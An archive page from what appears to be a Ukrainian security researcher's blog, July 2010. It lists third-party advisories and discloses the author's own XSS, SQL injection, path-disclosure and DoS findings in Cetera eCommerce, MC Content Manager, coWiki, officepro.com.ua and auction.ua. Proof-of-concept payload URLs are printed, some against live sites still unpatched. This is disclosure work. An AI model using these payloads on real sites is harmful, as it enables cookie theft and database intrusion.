Архів для категорії 'Уразливості'

Добірка уразливостей

15:22 29.07.2010

В даній добірці уразливості в веб додатках:

  • HP OpenView NNM ovsessionmgr.exe userid/passwd Heap Overflow Vulnerability (деталі)
  • HP OpenView NNM ovlogin.exe CGI userid/passwd Heap Overflow Vulnerability (деталі)
  • Hewlett-Packard OpenView NNM Snmp.exe Oid Variable Buffer Overflow Vulnerability (деталі)
  • TomatoCMS “q” SQL Injection Vulnerability (деталі)
  • TomatoCMS Script Insertion Vulnerabilities (деталі)
  • PolyPager 1.0rc10 (fckeditor) File Upload Security Issue (деталі)
  • Palo Alto Network Vulnerability - Cross-Site Scripting (XSS) (деталі)
  • SAP Business One 2005 Remote Buffer Overflow Vulnerability (деталі)
  • phpvidz Administrative Password Disclosure (деталі)
  • Multiple vulnerabilities in Kapitalist/capitalist (деталі)

Численні уразливості в Cetera eCommerce

15:18 28.07.2010

05.06.2010

У жовтні, 31.10.2009, я знайшов Cross-Site Scripting, SQL Injection та SQL DB Structure Extraction уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru.

Раніше я вже писав про уразливості в Cetera eCommerce.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

28.07.2010

XSS:

http://site/cms/templates/search.php?q=111&sobject=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/bannerlist.php?deleted=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/bannerlist.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/banner.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

На сторінці http://site/cms/templates/banner.php?bannerId=1
<script>alert(document.cookie)</script>В полях: Title, Текст.

SQL Injection:

http://site/cms/templates/banner.php?bannerId=1%20and%20version()=5

SQL DB Structure Extraction:

http://site/cms/templates/bannerlist.php?page=-1

Уразливі Cetera eCommerce 14.0 та попередні версії. Розробники в себе на сайт досі так і не виправили уразливості (окрім першої XSS).

Добірка уразливостей

15:17 27.07.2010

В даній добірці уразливості в веб додатках:

  • Security Notice for CA Service Desk (XSS) (деталі)
  • Knowledgeroot (fckeditor) Remote Arbitrary File Upload Exploit (деталі)
  • SmartCMS v.2 SQL injection vulnerability (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
  • HP OpenView NNM snmpviewer.exe CGI Host Header Stack Overflow Vulnerability (деталі)
  • HP OpenView NNM ovalarm.exe CGI Accept-Language Stack Overflow Vulnerability (деталі)
  • HP OpenView NNM webappmon.exe CGI Host Header Buffer Overflow Vulnerability (деталі)
  • Joomla Component advertising (com_aardvertiser) File Inclusion Vulnerability (деталі)
  • Blind SQL injection vulnerability in NPDS REvolution (деталі)
  • XSS vulnerability in NPDS (деталі)

Уразливості на www.officepro.com.ua

15:10 26.07.2010

08.12.2009

У квітні, 22.04.2009, я знайшов Cross-Site Scripting та Denial of Service уразливості на сайті http://www.officepro.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на viland.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.07.2010

XSS:

POST запит на сторінці www.officepro.com.ua/search_result.html
"><script>alert(document.cookie)</script>В полі “Поиск товаров”.

Дана уразливість виправлена, але неякісно і при зміні коду, знову працює.

XSS:

POST запит на сторінці www.officepro.com.ua/search_result.html
" style="-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)В полі “Поиск товаров”.

XSS через GET:

DoS:

POST запит на сторінці www.officepro.com.ua/search_result.html
%%В полі “Поиск товаров”.

DoS уразливість вже виправлена, але XSS все ще працює.

Численні уразливості в MC Content Manager

23:53 24.07.2010

В 2007 та 2009 році я виявив численні уразливості в MC Content Manager. Це Cross-Site Scripting та SQL Injection уразливості, що я виявив на http://www.szru.gov.ua - сайті СЗРУ. Де використовується даний движок.

Всього я виявив 5 XSS та 3 SQL Injection уразливостей в MC Content Manager: 1 XSS 08.01.2007 і 1 XSS 23.09.2007 (які я вже оприлюднив і про які раніше вже повідомив адмінів сайта та які вже виправлені), 2 XSS та 2 SQLi 30.09.2007 (про які я повідомив приватно, тому інформація про них публікуватися не буде, з яких до сих пір виправлено лише 3 з 4), 1 XSS і 1 SQLi 10.04.2009 (які я вже оприлюднив і про які раніше вже повідомив адмінів сайта та які досі не виправлені).

XSS:

http://site/article.php?root=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/static.php?page=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/cms/%3Cbody%20onload=alert(document.cookie)%3E/

SQL Injection:

http://site/cms/ua%20where%201=1–%20/

Уразливі ранні версії MC Content Manager від mc design (в скриптах на сайті СЗРУ версія CMS не зазначена). Остання версія MC Content Manager v.10.1.1 вже не вразлива (судячи по останнім сайтам цієї студії). Серед великої кількості сайтів розроблених mc design (що використовують MC Content Manager), перевірених мною цього місяця, я не знайшов жодних з даними уразливостями (на них використовуються або більш нові версії MC Content Manager, або інші компоненти), зате знайшов багато інших дірок в даному движку на різних сайтах. Про що я напишу з часом.

Добірка уразливостей

15:24 24.07.2010

В даній добірці уразливості в веб додатках:

  • 3Com OfficeConnect Firewall/Router multiple remote Vulnerabilities (деталі)
  • New mediawiki packages fix cross-site request forgery (деталі)
  • XSS in ecoCMS (деталі)
  • XSRF (CSRF) in Zikula Application Framework (деталі)
  • McKesson Horizon Clinical Infrastructure (HCI) version 7.6/7.8/10.0/10.1 hardcoded passwords (деталі)
  • XSS in eliteCMS (деталі)
  • XSS in Acuity CMS (деталі)
  • XSRF (CSRF) in eliteCMS (деталі)
  • NolaPro Enterprise multiple vulnerabilities (деталі)
  • Microsoft Security Bulletin MS09-061 - Critical Vulnerabilities in the Microsoft .NET Common Language Runtime Could Allow Remote Code Execution (974378) (деталі)

Нові уразливості на auction.ua

15:23 23.07.2010

09.12.2009

У квітні, 19.04.2009, я знайшов Full path disclosure та Information Leakage уразливості на сайті http://auction.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Уразливості я знайшов в партнерському скрипті від auction.ua, але вони наявні й на сайті самого аукціону auction.ua. Даний партнерському скрипт реалізований таким чином, що домен сайта (основний домен) або його піддомен може бути зроблений як аукціон на движку auction.ua. Таких сайтів чимало. І відповідно дірки, що наявні на даному сайті, фізично знаходяться на сервері auction.ua.

Раніше я вже писав про уразливості на auction.meta.ua та інших доменах проекту auction.ua.

Детальна інформація про уразливості з’явиться пізніше.

23.07.2010

Full path disclosure:

http://auction.ua/makethumb2.php?pic=..

Information Leakage:

http://auction.ua/makethumb2.php?pic=index.php&w=100
http://auction.ua/makethumb2.php?pic=index&w=100

Різні відповіді скрипта при вірному імені файла і/або директорії та невірному імені, дозволяють ідентифікувати файли та директорії на сервері.

Дані уразливості досі не виправлені.

Добірка уразливостей

15:16 22.07.2010

В даній добірці уразливості в веб додатках:

  • Multiple Flaws in Huawei SmartAX MT880 [was: Multiple Flaws in Huawei D100] (деталі)
  • TaskFreak 0.6.2 SQL Injection Vulnerability (деталі)
  • vBulletin - Insecure Custom BBCode Tags (деталі)
  • Apache ActiveMQ XSS Vulnerability (деталі)
  • openjdk-6 vulnerabilities (деталі)
  • Openannuaire Openmairie Annuaire 2.00 (RFI/LFI) Multiple File Include Vulnerability (деталі)
  • Opencadastre 1.02 Local File Include Vulnerability (деталі)
  • Opencimetiere 2.01 Multiple Remote File Include Vulnerability (деталі)
  • Opencatalogue 1.024 Local File Include Vulnerability (деталі)
  • 2WIRE Gateway Authentication Bypass & Password Reset (деталі)

SQL Injection уразливість в coWiki

15:07 21.07.2010

12.09.2009

У січні, 23.01.2009, я знайшов SQL Injection уразливість в coWiki. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про XSS уразливість в coWiki.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам системи.

21.07.2010

SQL Injection:

http://site/index.php?node=-1′%20or%20version()%3E’5

Уразливі coWiki 0.3.4 та попередні версії.

Ще коли я в 2007 році повідомив розробникам про XSS дірку, вони відповіли мені, що більше не відтримують даний движок (а цього разу взагалі не відповіли). Тому користувачам даної системи потрібно самотужки виправити цю дірку (як і попередню).

Добірка уразливостей

15:11 20.07.2010

В даній добірці уразливості в веб додатках:

  • HP ProCurve Threat Management Services zl Module (J9155A), Remote Unauthorized Access, Denial of Service (DoS) (деталі)
  • BPstyle - Graphic studio SQL Injection Vulnerabilities (деталі)
  • OS Command Injection in Cacti <= 0.8.7e (деталі)
  • SQL Injection in Cacti <= 0.8.7e (деталі)
  • Novell eDirectory iMonitor “Accept-Language” Buffer Overflow (деталі)
  • Jcaptcha vulnerability (деталі)
  • Amiro CMS<=5.4.4 PHP injection (деталі)
  • XSS in Drupal Better Formats Module (деталі)
  • Multiple Vulnerabilities in Cisco Wireless LAN Controllers (деталі)
  • Cisco WLC 4402 Denial-of-Service vulnerability (деталі)